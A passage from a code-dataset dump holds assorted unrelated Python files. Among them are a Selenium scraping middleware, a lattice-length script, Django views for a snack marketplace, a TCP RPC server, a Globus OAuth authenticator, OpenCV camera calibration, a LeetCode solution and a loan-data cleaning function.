webdriver.Chrome(chrome_options=chrome_options)\n        self.load_timeout = self.browser.set_page_load_timeout(self.timeout)\n        self.wait = WebDriverWait(self.browser, self.timeout)\n\n    def __del__(self):\n        self.browser.close()\n\n    def process_request(self, request, spider):\n        \"\"\"\n        Use Chromedriver to fetch the page\n        :param request: Request object\n        :param spider: Spider object\n        :return: HtmlResponse\n        \"\"\"\n        try:\n            self.logger.debug('--------Chrome is Starting--------')\n            self.browser.get(request.url)\n            return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n                                status=200)\n        except TimeoutException:\n            self.logger.debug('--------Chrome is Timeout--------')\n            self.browser.close()\n            self.__init__()\n            return HtmlResponse(url=request.url, status=500, request=request)\n\n    @classmethod\n    def from_crawler(cls, crawler):\n        return cls(timeout=crawler.settings.get('SELENIUM_TIMEOUT'),\n                   service_args=crawler.settings.get('CHROMEDRIVER_SERVICE_ARGS'))","sub_path":"huxiu/huSpider/huSpider/middlewares/SeleniumMiddleware.py","file_name":"SeleniumMiddleware.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"401190586","text":"\nimport subprocess\nimport pandas as pd\nimport os\nimport csv\nfrom shlex import split\n\n\n# THIS is understood by PYTHON 3.6, but it's not what I want to do:\n#blob=subprocess.check_output(['sdds2stream', ll[1], '-col=s'],stderr= subprocess.STDOUT).decode('UTF-8')\n\n\n##########################################################################################################\n##########################################################################################################\n### FBT : the below block is the python equivalent of the lattice length calculated in the plott script\n#from subprocess import Popen, PIPE\n#from shlex import split\n#p1 = Popen(split(\"sdds2stream %s -col=s\" %ll[1]), 
stdout=PIPE)\n#p2 = subprocess.check_output(split(\"tail -1\"), stdin=p1.stdout).decode('UTF-8')\n#\n#print(p2)\n#p3=float(p2)\n#p4=p3*100\n##########################################################################################################\n##########################################################################################################\n\ndd=pd.read_csv('blob.csv')\n\n\n\nd32=dd[['Twi_Files_List']]\n\n\n\ndft2=pd.DataFrame(columns=[['TwissName','LatticeLength']])\n\n\n\n\nk=0\n\nfor nombre in range(0, len(d32)): #len(d32) is the total number in the list of Twiss Files\n fichier=d32.iloc[nombre]['Twi_Files_List']\n \n #df2=pd.read_csv(fichier) no !! coz fichier est un SDDS file pas un csv\n from subprocess import Popen, PIPE\n #from shlex import split\n p1 = Popen(split(\"sdds2stream %s -col=s\" %fichier), stdout=PIPE)\n p2 = subprocess.check_output(split(\"tail -1\"), stdin=p1.stdout).decode('UTF-8') \n print(' ')\n print(' ')\n print(fichier)\n print(p2)\n try:\n p3=float(p2)\n except ValueError:\n p3=-3.1415926999\n \n dft2.loc[nombre,'TwissName']=fichier\n dft2.loc[nombre,'LatticeLength']=p3\n print(nombre)\n\n\n\n\ndft2.to_csv('LatticesLengthsList.csv')\n\n\n\n\ndfcsv = pd.read_csv('LatticesLengthsList.csv',float_precision='round_trip')\n\ndfTemp2=dfcsv['LatticeLength']>561.54\ndfTemp3=dfcsv['LatticeLength']<561.545\n\ndfTemp4=dfcsv[dfTemp2]\ndiad=dfTemp4[dfTemp3]\n\ndiad.to_csv('diadLengths.csv')","sub_path":"e2s_ELEGANT/ExtractTwissList_part2_avec_TL.py","file_name":"ExtractTwissList_part2_avec_TL.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"225037055","text":"from django.urls import path\n\nfrom . import views \n\nurlpatterns = [\n path('delete/', views.delete,name='delete'),\n path('update/', views.update,name='update'),\n path('', views.list,name='list'),\n path('create/', views.create,name='create'),\n]\n","sub_path":"10.crud_delete/sosmed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"282061162","text":"# -*- coding:utf-8 -*-\n__author__ = u'Joël Vogt'\nimport socket\nfrom multiprocessing.dummy import Process, current_process\n\nfrom walkabout.connection import CLOSE_CONNECTION, FLUSH_BUFFER_REQUEST\nfrom walkabout.connection.tcp_socket import MESSAGE_HEADER, HEADER_DELIMITER, MESSAGE_HEADER_END, \\\n get_header_from_message\nfrom walkabout.helpers.datalib import InputStreamBuffer\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# from pathos.multiprocessing import ProcessingPool as Pool\n# from pathos.helpers import cpu_count\n\nTIMEOUT = 10\nSTATE_RUNNING = 0\nSTATE_FINISHING = 1\nSTATE_END_CALL = 2\n\n\ndef _function_process(tcp_client_socket, buffer_size, remote_functions, endpoint):\n input_buffer = None\n total_data_size = 0\n remote_function = None\n \"\"\" return_value == -1 if no function_ref was called.\n None can be returned by functions without explicit return value\"\"\"\n function_ref = None\n frame = None\n next_frame = None\n message = None\n event = None\n state = STATE_RUNNING\n return_value = -1\n is_used_by_client = True\n\n # Locally stored references of commonly used functions and data objects\n f_input_buffer_extend = None\n\n f_str_join = ''.join\n\n f_tcp_socket_receive = tcp_client_socket.recv\n f_tcp_socket_send = tcp_client_socket.send\n\n f_endpoint_to_send = endpoint.to_send\n f_endpoint_to_receive = 
endpoint.to_receive\n\n while is_used_by_client:\n while is_used_by_client:\n if state == STATE_RUNNING:\n message = f_tcp_socket_receive(buffer_size)\n\n elif state == STATE_FINISHING:\n\n if next_frame:\n message = next_frame\n next_frame = None\n else:\n\n state = STATE_END_CALL\n return_value = -1\n break\n\n if CLOSE_CONNECTION == message:\n is_used_by_client = False\n break\n\n if FLUSH_BUFFER_REQUEST == message[-3:]:\n\n event = FLUSH_BUFFER_REQUEST\n state = STATE_FINISHING\n\n if len(message) > 3:\n message = message[:-3]\n else:\n continue\n if not message:\n is_used_by_client = False\n return_value = -1\n break\n\n if not remote_function:\n if next_frame:\n message = f_str_join([next_frame, message])\n next_frame = None\n if message[:3] != MESSAGE_HEADER:\n return_value = ReferenceError(\n 'Message does not contain header information and a function_ref reference')\n frame = None\n break\n try:\n function_ref, total_data_size, message = get_header_from_message(message)\n remote_function = remote_functions[function_ref]\n input_buffer = InputStreamBuffer(buffer_size=buffer_size)\n f_input_buffer_extend = input_buffer.extend\n\n except IndexError:\n return_value = AttributeError(\"Server side exception: \\\n Remote module doesn't have the function_ref you tried to call\")\n frame = None\n break\n\n diff = total_data_size - (input_buffer.size + len(message))\n if diff < 0:\n next_frame = message[diff:]\n message = message[:diff]\n f_input_buffer_extend(message)\n\n if total_data_size < input_buffer.size:\n frame = None\n return_value = OverflowError(\n 'Server side exception: \\\n The size {0} is longer than \\\n the expected message size {1}'.format(\n input_buffer.size,\n total_data_size))\n\n elif total_data_size == input_buffer.size:\n frame = input_buffer[0:input_buffer.size]\n else:\n continue\n break\n input_buffer = None\n f_input_buffer_extend = None\n if frame:\n args, kwargs = f_endpoint_to_receive(frame)\n frame = None\n try:\n return_value = remote_function(*args, **kwargs)\n except Exception as e:\n e.message = \"server exception {0}\".format(e.message)\n return_value = e\n\n if return_value != -1:\n if isinstance(return_value, Exception):\n is_used_by_client = False\n\n serialized_content = f_endpoint_to_send(return_value)\n return_message = '%(header)s' \\\n '%(delimiter)s' \\\n '%(function_ref)s' \\\n '%(delimiter)s' \\\n '%(message_length)d' \\\n '%(delimiter)s' \\\n '%(header_end)s' \\\n '%(message)s' % \\\n dict(\n header=MESSAGE_HEADER,\n function_ref=function_ref,\n message_length=len(serialized_content),\n message=serialized_content,\n delimiter=HEADER_DELIMITER,\n header_end=MESSAGE_HEADER_END)\n f_tcp_socket_send(return_message)\n remote_function = None\n return_value = -1\n if state == STATE_END_CALL:\n if event:\n f_tcp_socket_send(event)\n event = None\n state = STATE_RUNNING\n f_tcp_socket_send(CLOSE_CONNECTION)\n tcp_client_socket.close()\n\n\nclass Server(object):\n def __init__(self, hostname, port, buffer_size, endpoint):\n self.hostname = hostname\n self.port = port\n self.buffer_size = buffer_size\n self.buffered_methods = []\n self.unbuffered_methods = []\n self._endpoint = endpoint\n self._remote_functions = {}\n self._tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._tcp_server_socket.bind((self.hostname, self.port))\n self._tcp_server_socket.listen(5)\n self._ready = True\n\n def _register_function(self, func, name):\n 
self._remote_functions[name] = func\n\n\n def run(self):\n while current_process().is_alive():\n tcp_client_socket, _ = self._tcp_server_socket.accept()\n p = Process(\n target=_function_process,\n args=(tcp_client_socket,\n self.buffer_size,\n self._remote_functions,\n self._endpoint))\n p.start()\n self._tcp_server_socket.close()\n\n def __call__(self, networked_func, buffered):\n function_name = networked_func.__name__\n\n def buffered_function(func):\n # if func.func_code.co_argcount == 1 and cpu_count() > 1:\n # def on_call(params):\n # single_arguments = map(lambda x: x[0][0], params)\n # pool = Pool(processes=cpu_count())\n # return pool.map(func, single_arguments)\n # else:\n def on_call(params):\n return [func(*args, **kwargs) for args, kwargs in params]\n\n return on_call\n\n if buffered:\n self.buffered_methods.append(function_name)\n self._register_function(buffered_function(networked_func), name=function_name)\n else:\n self.unbuffered_methods.append(function_name)\n self._register_function(networked_func, name=function_name)\n","sub_path":"walkabout/connection/tcp_socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"427142733","text":"from sqlalchemy.sql.operators import exists\nfrom .userRepositoryContract import UserRepositoryContract\nfrom uuid import uuid4\nfrom ...controllers import AuthController\nfrom ...models import User\nfrom api import db\nfrom sqlalchemy import update,exc\nfrom pprint import pprint\nclass UserRepositorySQLALCHEMY(db.Model,UserRepositoryContract):\n\n __tablename__ =\"users\"\n id=db.Column(db.String(255), primary_key=True)\n nome=db.Column(db.String(200))\n email=db.Column(db.String(200))\n nome_empresa=db.Column(db.String(200))\n telefone=db.Column(db.String(16))\n telefone2=db.Column(db.String(16))\n cpf_cnpj=db.Column(db.String(18))\n data_nascimento=db.Column(db.DateTime)\n sexo=db.Column(db.Enum(\"F\",\"M\"))\n login=db.Column(db.String(45))\n senha=db.Column(db.String(255))\n created_at=db.Column(db.DateTime(timezone=True), server_default=db.func.now())\n updated_at=db.Column(db.DateTime(timezone=True), onupdate=db.func.now())\n deleted=db.Column(db.Integer(),default=0)\n __table_args__= (\n db.UniqueConstraint(\"cpf_cnpj\",\"email\",\"login\"),\n )\n\n\n def __init__(self,user:User) -> None:\n if user.id == None:\n user.id = uuid4()\n \n if hasattr(user, 'senha'):\n user.senha = AuthController().generatePassword(user.senha)\n \n self.id = user.id\n self.nome = user.nome\n self.email = user.email\n self.telefone = user.telefone\n self.telefone2 = user.telefone2\n self.nome_empresa = user.nome_empresa\n self.cpf_cnpj = user.cpf_cnpj\n self.data_nascimento =user.data_nascimento\n self.sexo =user.sexo\n self.senha =user.senha\n self.login=user.login\n self.deleted=user.deleted\n \n def getById(self,id):\n return self.query.get(id)\n \n def getList(self):\n return self.__dict__\n \n def update(self,object:User):\n db.session.query(UserRepositorySQLALCHEMY).filter(UserRepositorySQLALCHEMY.id == self.id).update(object.__dict__)\n db.session.commit() \n\n def save(self):\n user = db.session.query(UserRepositorySQLALCHEMY).filter(\n UserRepositorySQLALCHEMY.cpf_cnpj == self.cpf_cnpj,\n UserRepositorySQLALCHEMY.email == self.email,\n UserRepositorySQLALCHEMY.login == self.login,\n ).first()\n if user !=None:\n return {\n \"id\":user.id,\n \"msg\": \"user already exists\"\n }\n\n db.session.add(self)\n 
db.session.commit()\n return {\n \"id\":self.id,\n \"msg\":\"created successful\"\n }\n","sub_path":"api/repositories/user/userRepositorySQLALCHEMY.py","file_name":"userRepositorySQLALCHEMY.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"277419050","text":"from django.shortcuts import render#, get_object_or_404\nfrom .models import hospital\nfrom django.db.models import Q\nfrom .form import sellerForm\n\n# Create your views here.\ndef home(request):\n\tqueryset_list = hospital.objects.all()\n\tquery = request.GET.get(\"q\")\n\tform = sellerForm(request.POST or None)\n\t\n\tif query:\n\t\tqueryset_list = queryset_list.filter(Q(name__contains=query))\n\t\tcontext={\"queryset_list\":queryset_list,\"form\":form}\n\t\treturn render(request, \"detail.html\",context)\n\n\treturn render(request, \"index.html\",{})\n\n\ndef getinfo(request):\n\tform = sellerForm(request.POST or None)\n\t#if request.method == \"POST\":\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\n\n\treturn render(request, \"detail.html\", {})\n\n\n\n\n\n#def detail(request):\n#\tinstance= get_object_or_404(hospital, id=1)\n#\tcontext = {\n#\t\t\"name\": instance.name,\n#\t\t\"instance\": instance,\n#\t}\n#\treturn render(request, \"detail.html\",context)\n","sub_path":"web/manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"278140416","text":"\"\"\"\nCustom Authenticator to use Globus OAuth2 with JupyterHub\n\"\"\"\nimport pwd\nfrom tornado import gen, web\nfrom tornado.auth import OAuth2Mixin\nfrom tornado.concurrent import return_future\nfrom tornado.web import HTTPError\nfrom .oauth2 import OAuthLoginHandler, OAuthenticator\n\ntry:\n import globus_sdk\nexcept:\n raise ImportError(\"Trying to use the Globus Auth \"\n \"authenticator, but globus_sdk \"\n \"is not installed\")\n\n\nclass GlobusMixin(OAuth2Mixin):\n \"\"\"\n Overriding the tornado function because\n globus provides it's own method to assemble the\n authorize url\n \"\"\"\n @return_future\n def authorize_redirect(self, client=None, callback=None):\n self.redirect(client.oauth2_get_authorize_url())\n callback()\n\n\nclass GlobusLoginHandler(OAuthLoginHandler, GlobusMixin):\n def get(self):\n # Doing the scope weirdness for the globus_sdk\n scopes = ['openid', 'profile', 'email',\n 'urn:globus:auth:scope:auth.globus.org:view_identities']\n scope_string = (' ').join(scopes)\n redirect_uri = self.authenticator.get_callback_url(self)\n client = self.authenticator.globus_portal_client()\n client.oauth2_start_flow(\n redirect_uri,\n requested_scopes=scope_string,\n refresh_tokens=True)\n self.log.info('globus redirect: %r', redirect_uri)\n self.authorize_redirect(client)\n\n\nclass GlobusOAuthenticator(OAuthenticator):\n\n login_service = \"Globus\"\n login_handler = GlobusLoginHandler\n\n def globus_portal_client(self):\n \"\"\"\n Create an Globus Auth ConfidentialAppAuthClient\n Need a ConfidentialAppAuthClient because the NativeAppClient\n would require user input, i.e. c/p the token from the website\n somewhere, which we wont do... 
for now.\n        \"\"\"\n        return globus_sdk.ConfidentialAppAuthClient(\n            self.client_id,\n            self.client_secret)\n\n    @gen.coroutine\n    def authenticate(self, handler, data=None):\n        \"\"\"\n        Overwriting the authenticate method with a Globus Auth specific one\n        \"\"\"\n        code = handler.get_argument(\"code\", False)\n        if not code:\n            raise web.HTTPError(400, \"oauth callback made without a token\")\n        # TODO: Configure the curl_httpclient for tornado\n        scopes = ['openid', 'profile', 'email',\n                  'urn:globus:auth:scope:auth.globus.org:view_identities']\n        scope_string = (' ').join(scopes)\n        redirect_uri = self.get_callback_url(self)\n        client = self.globus_portal_client()\n        client.oauth2_start_flow(\n            redirect_uri,\n            requested_scopes=scope_string,\n            refresh_tokens=True)\n        # Doing the code for token for id_token exchange\n        tokens = client.oauth2_exchange_code_for_tokens(code)\n        id_token = tokens.decode_id_token(client)\n        username = id_token.get('preferred_username')\n        if not username.endswith('@globusid.org'):\n            raise HTTPError(403, (\"You are not signed in \"\n                                  \"to your {} account.\".format(\"Globus ID\")))\n        # Need to return a username without the \"email\" ending\n        username = username.split('@')[0]\n        return username\n\n    def get_callback_url(self, handler=None):\n        \"\"\"\n        Getting the configured callback url\n        \"\"\"\n        if self.oauth_callback_url is None:\n            raise HTTPError(500, (\"No callback url provided. \"\n                                  \"Please configure by adding \"\n                                  \"c.GlobusOAuthenticator.oauth_callback_url \"\n                                  \"to the config\"))\n        return self.oauth_callback_url\n","sub_path":"oauthenticator/globus.py","file_name":"globus.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"316082032","text":"import numpy as np\nimport cv2\nimport glob\n\ndef calibrate(path='../data/cali/example/', m=4, n=7):\n    ''' \n    Use opencv to calibrate the camera\n\n    Args:\n    path: the folder to the calibration pictures\n    m,n: the number of grids used for calibration\n    (which is not the number of total grids in the chessboard, but two grids smaller than it)\n\n\n    Returns: intrinsic_matrix\n    '''\n    # termination criteria\n    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)\n\n    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\n    objp = np.zeros((n*m,3), np.float32)\n    objp[:,:2] = np.mgrid[0:n,0:m].T.reshape(-1,2)\n\n    # Arrays to store object points and image points from all the images.\n    objpoints = [] # 3d point in real world space\n    imgpoints = [] # 2d points in image plane.\n\n    path += '*.jpg'\n    print(path)\n    images = glob.glob(path)\n    # print(images)\n    h, w = 0, 0\n    gray = None\n    for fname in images:\n        # img = cv2.imread(fname)\n        # cv2.imshow('img',img)\n        # cv2.waitKey(500)\n        img = cv2.imread(fname)\n        h, w = img.shape[:2]\n        gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n        # Find the chess board corners\n        ret, corners = cv2.findChessboardCorners(gray, (n,m),None)\n\n        # If found, add object points, image points (after refining them)\n        if ret == True:\n            objpoints.append(objp)\n\n            corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\n            imgpoints.append(corners2)\n\n            # Draw and display the corners\n            img = cv2.drawChessboardCorners(img, (n,m), corners2,ret)\n            # cv2.imshow('img',img)\n            # cv2.waitKey(500)\n\n    cv2.destroyAllWindows()\n\n    ret, mtx, dist, _, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\n\n    intrinsic_matrix, _=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n\n    
print(intrinsic_matrix)\n return intrinsic_matrix","sub_path":"7-3d-pose-estimation-and-objectron/proj5_code/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"374801853","text":"from django.shortcuts import render\nimport urllib.request\nimport urllib.parse\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import hashers\nfrom kafka import KafkaProducer\nfrom elasticsearch import Elasticsearch\n\n# Create your views here.\n\n\ndef index(request):\n\tprint (\"About to perform the GET request...\")\n\treq_snacks = urllib.request.Request('http://models-api:8000/api/v1/snacks/')\n\treq_users = urllib.request.Request('http://models-api:8000/api/v1/users/')\n\tresp_snacks = urllib.request.urlopen(req_snacks).read().decode('utf-8')\n\tresp_users = urllib.request.urlopen(req_users).read().decode('utf-8')\n\tjson_snacks = json.loads(resp_snacks)\n\tjson_users = json.loads(resp_users)\n\treturn_data = {\"status_code:\": 200, \"data\": {\"users\": json_users, \"snacks\": json_snacks}}\n\n\treturn JsonResponse(return_data)\n\ndef sort(request):\n\tprint (\"About to perform the GET request...\")\n\treq_snacks = urllib.request.Request('http://models-api:8000/api/v1/snacks/')\n\tresp_snacks = urllib.request.urlopen(req_snacks).read().decode('utf-8')\n\tjson_snacks = json.loads(resp_snacks)\n\tnewlist = sorted(json_snacks['data'], key=lambda k: k['country']) \n\treturn_data = {\"status_code:\": 200, \"data\": newlist}\n\n\treturn JsonResponse(return_data)\n\n\n@csrf_exempt\ndef details(request,pk):\n\treq_snack = urllib.request.Request('http://models-api:8000/api/v1/snacks/' + pk)\n\tresp_snack = urllib.request.urlopen(req_snack).read().decode('utf-8')\n\tjson_snack = json.loads(resp_snack)\n\t#user_pk = request.COOKIES.get('pk', \"0\")\n\t#send_new_detail = {\"item_id\": pk, 'user_id': user_pk}\n\treturn_data = {\"status_code:\": 200, \"data\": {\"snack\": json_snack}}\n\n\t# Kafka for item and user id, NEED TO GET USER ID\n\t#producer = KafkaProducer(bootstrap_servers='kafka:9092')\n\t#producer.send('spark-job', json.dumps(send_new_detail).encode('utf-8'))\n\n\treturn JsonResponse(return_data)\n\n\ndef recs(request, pk):\n\treq_recs = urllib.request.Request('http://models-api:8000/api/v1/recs/' + pk)\n\tresp_recs = urllib.request.urlopen(req_recs).read().decode('utf-8')\n\tjson_recs = json.loads(resp_recs)\n\t\n\tall_rec_obj = []\n\tif json_recs['status_code'] != '404':\n\t\tdata = json_recs['data']\n\t\trecs = (data['recommended_items']).split(',')\n\t\tfor reccomendation in recs:\n\t\t\treq_snack = urllib.request.Request('http://models-api:8000/api/v1/snacks/' + reccomendation)\n\t\t\tresp_snack = urllib.request.urlopen(req_snack).read().decode('utf-8')\n\t\t\tjson_snack = json.loads(resp_snack)\n\t\t\tall_rec_obj.append(json_snack['data'])\n\n\n\treturn_data = {\"status_code:\": 200, \"data\": all_rec_obj }\n\treturn JsonResponse(return_data)\n\n\n@csrf_exempt\ndef reccomendation(request):\n# Kafka for item and user id, NEED TO GET USER ID\n\tuser_id = request.POST.get(\"user_id\")\n\titem_id = request.POST.get(\"item_id\")\n\tsend_new_detail = {\"item_id\": item_id, 'user_id': user_id}\n\tproducer = KafkaProducer(bootstrap_servers='kafka:9092')\n\tproducer.send('spark-job', json.dumps(send_new_detail).encode('utf-8'))\n\n\treturn JsonResponse(send_new_detail)\n\n\n@csrf_exempt\ndef 
validate_user(request):\n\treq_users = urllib.request.Request('http://models-api:8000/api/v1/users/')\n\tresp_users = urllib.request.urlopen(req_users).read().decode('utf-8')\n\tjson_users = json.loads(resp_users)['data']\n\n\n\temail = request.POST['email']\n\tpassword = request.POST['password']\n\n\tfor user in json_users:\n\t\tif user['email'] == email and hashers.check_password(password, user['password']):\t\t\t\n\t\t\tauthenticator = urllib.request.Request('http://models-api:8000/api/v1/create_auth/' + str(user['pk']) )\n\t\t\tresp_auth = urllib.request.urlopen(authenticator).read().decode('utf-8')\n\t\t\tjson_auth = json.loads(resp_auth)\n\n\t\t\tif json_auth ['status_code'] == '200':\n\t\t\t\treturn JsonResponse({'status_code': '200', 'auth' : json_auth ['data']['auth'], 'pk': user['pk']})\n\t\n\treturn JsonResponse({'status_code': '404'})\n\n\n\n@csrf_exempt\ndef register(request):\n\tfirst_name = request.POST.get(\"first_name\")\n\tlast_name = request.POST.get(\"last_name\")\n\temail = request.POST.get(\"email\")\n\tphone_number = request.POST.get(\"phone_number\")\n\tpassword = request.POST.get(\"password\")\n\n\turl = 'http://models-api:8000/api/v1/users/create'\n\tdata = {'first_name' : first_name, 'last_name': last_name, 'password': password, 'email': email, 'phone_number': phone_number}\n\tdata = bytes( urllib.parse.urlencode( data ).encode() )\n\thandler = urllib.request.urlopen(url, data);\n\t\n\n\tpost_feedback = handler.read().decode('utf-8')\n\tresp = json.loads(post_feedback)\n\treturn JsonResponse(resp)\n\n@csrf_exempt\ndef create_snack(request):\n\turl = 'http://models-api:8000/api/v1/snacks/create'\n\n\treq_auths = urllib.request.Request('http://models-api:8000/api/v1/auths/')\n\tresp_auths = urllib.request.urlopen(req_auths).read().decode('utf-8')\n\tjson_auths = json.loads(resp_auths)['data']\n\n\tname = request.POST.get(\"name\", \"No name Provided\")\n\tdescription = request.POST.get(\"description\", \"No description Provided\")\n\tprice = request.POST.get(\"price\", 0.00)\n\tnutrition_info = request.POST.get(\"nutrition_info\",\"No nutrition_info Provided\")\n\tcountry = request.POST.get(\"country\", \"No nutrition_info Provided\")\n\tauth = request.POST.get(\"auth\", \"No Auth Provided\")\n\tfor authenticator in json_auths:\n\t\tif authenticator[\"authenticator\"] == auth:\n\t\t\tdata_vals = {'name' : name, 'description': description, 'price': price, 'nutrition_info': nutrition_info, 'country' : country}\n\t\t\t\n\t\t\tdata = bytes( urllib.parse.urlencode( data_vals ).encode() )\n\t\t\thandler = urllib.request.urlopen(url, data);\n\t\t\t\n\n\t\t\tpost_feedback = handler.read().decode('utf-8')\n\t\t\tresp = json.loads(post_feedback)\n\n\t\t\tresp['Data'] = data_vals\n\n\t\t\t##### Kafka section: ######\n\t\t\tproducer = KafkaProducer(bootstrap_servers='kafka:9092')\n\t\t\tsend_new_listing = resp\n\t\t\tproducer.send('new-snack', json.dumps(send_new_listing).encode('utf-8'))\n\t\t\t#### End of Kafka section ####\n\n\t\t\treturn JsonResponse(resp)\n\n\treturn JsonResponse({'status_code': '403'})\n\n@csrf_exempt\ndef search(request):\n\tes = Elasticsearch(['es'])\n\tif request.method == 'POST':\n\t\tquery = request.POST.get('search_input')\n\t\tquery_results = es.search(index='listing_index', body={'query': {'query_string': {'query': query}}, 'size': 10})\n\n\t\tresults = []\n\t\tfor snack in query_results['hits']['hits']:\n\t\t\tresults.append(snack)\n\n\t\treturn JsonResponse({'status_code': '200', 'data': results})\n\n\treturn JsonResponse({'status_code': 
'500'})\n\n\n@csrf_exempt\ndef logout(request):\n\turl = 'http://models-api:8000/api/v1/destroy_auth/'\n\tcookie = request.POST.get('authenticator_token')\n\tdata = {'authenticator_token' : cookie}\n\tdata = bytes( urllib.parse.urlencode( data ).encode() )\n\thandler = urllib.request.urlopen(url, data);\n\n\treturn JsonResponse({'status_code': '200'})\n\n\n\n","sub_path":"food_world_exp_api/food_world_exp_api_core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"345360791","text":"#\r\n# @lc app=leetcode.cn id=513 lang=python3\r\n#\r\n# [513] 找树左下角的值\r\n#\r\n# https://leetcode-cn.com/problems/find-bottom-left-tree-value/description/\r\n#\r\n# algorithms\r\n# Medium (66.88%)\r\n# Likes: 52\r\n# Dislikes: 0\r\n# Total Accepted: 6.8K\r\n# Total Submissions: 10.1K\r\n# Testcase Example: '[2,1,3]'\r\n#\r\n# 给定一个二叉树,在树的最后一行找到最左边的值。\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n# 输入:\r\n#\r\n# ⁠ 2\r\n# ⁠ / \\\r\n# ⁠ 1 3\r\n#\r\n# 输出:\r\n# 1\r\n#\r\n#\r\n#\r\n#\r\n# 示例 2:\r\n#\r\n#\r\n# 输入:\r\n#\r\n# ⁠ 1\r\n# ⁠ / \\\r\n# ⁠ 2 3\r\n# ⁠ / / \\\r\n# ⁠ 4 5 6\r\n# ⁠ /\r\n# ⁠ 7\r\n#\r\n# 输出:\r\n# 7\r\n#\r\n#\r\n#\r\n#\r\n# 注意: 您可以假设树(即给定的根节点)不为 NULL。\r\n#\r\n#\r\n\r\n# @lc code=start\r\n# Definition for a binary tree node.\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\ntry:\r\n import os\r\n import sys\r\n curFileParentPath = os.path.dirname(\r\n os.path.dirname(os.path.realpath(__file__)))\r\n sys.path.append(curFileParentPath)\r\n from typing import *\r\n from collections import defaultdict\r\n from Utils.Tree import *\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def findBottomLeftValue(self, root: TreeNode) -> int:\r\n # 简单的LEVEL ORDER..如果没有新的节点加入则说明是最后一行\r\n q = [root]\r\n while q:\r\n curlen = len(q)\r\n for n in q[:curlen]:\r\n if n.left:\r\n q.append(n.left)\r\n if n.right:\r\n q.append(n.right)\r\n if len(q) == curlen:\r\n return q[0].val\r\n q = q[curlen:]\r\n\r\n\r\n# @lc code=end\r\n","sub_path":"Medium/513.找树左下角的值.py","file_name":"513.找树左下角的值.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"348462974","text":"# %load q02_data_cleaning_all/build.py\n# Default Imports\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.dirname('__file__'))))\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom greyatomlib.logistic_regression_project.q01_outlier_removal.build import outlier_removal\nfrom sklearn.preprocessing import Imputer\n\nloan_data = pd.read_csv('data/loan_prediction_uncleaned.csv')\nloan_data = loan_data.drop('Loan_ID', 1)\nloan_data = outlier_removal(loan_data)\n\n\n# Write your solution here :\ndef data_cleaning(loan_data):\n X = loan_data.iloc[:,:-1]\n y = loan_data.iloc[:,-1]\n X_train, X_test, y_train, y_test = train_test_split(X,y,random_state = 9, test_size = 0.25)\n X_train_mean = X_train['LoanAmount'].mean()\n X_test_mean = X_test['LoanAmount'].mean()\n X_test.LoanAmount.fillna(X_test_mean,inplace = True)\n X_train.LoanAmount.fillna(X_train_mean,inplace = True)\n \n X_test.Gender.fillna(X_test['Gender'].mode()[0],inplace = True)\n X_test.Married.fillna(X_test['Married'].mode()[0],inplace = True)\n X_test.Dependents.fillna(X_test['Dependents'].mode()[0],inplace = True)\n 
